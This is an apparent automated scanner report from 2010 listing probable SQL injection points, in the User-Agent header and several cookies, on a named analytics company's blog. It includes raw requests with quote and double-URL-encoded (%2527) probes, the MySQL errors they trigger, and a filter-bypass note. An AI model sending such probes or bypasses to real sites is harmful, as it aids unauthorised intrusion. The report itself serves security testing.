<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)' Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:54:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'' Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:54:09 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:54:09 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:54:09 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utma cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:49:04 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1%2527%2527; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:49:13 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:49:27 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:49:28 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141'; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:45:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141''; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:45:08 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:45:11 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:45:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37532
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the apros2.0_tpl cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:46:05 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0%2527%2527; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:46:07 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:46:11 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:46:11 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37533
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The optimizelyEndUserId cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the optimizelyEndUserId cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the optimizelyEndUserId cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:52:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/93-dimensionator-google-analytics-dimensions.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169%2527%2527;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 05:52:26 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 05:52:27 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 05:52:27 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37532
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1'; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:47:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1''; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:47:43 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:47:56 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:47:56 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22847
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmmobile cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:09:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c%2527%2527; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 06:09:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 06:09:23 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 06:09:23 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22847
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The __utmmobile cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmmobile cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c'; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:56:35 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /blog/googleanalytics/95-more-dimensions-site-search-source-medium.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog.html?start=10 Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c''; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Fri, 05 Nov 2010 23:56:36 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Wed, 26-Oct-2011 23:57:01 GMT; path=/ Last-Modified: Fri, 05 Nov 2010 23:57:01 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22847
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
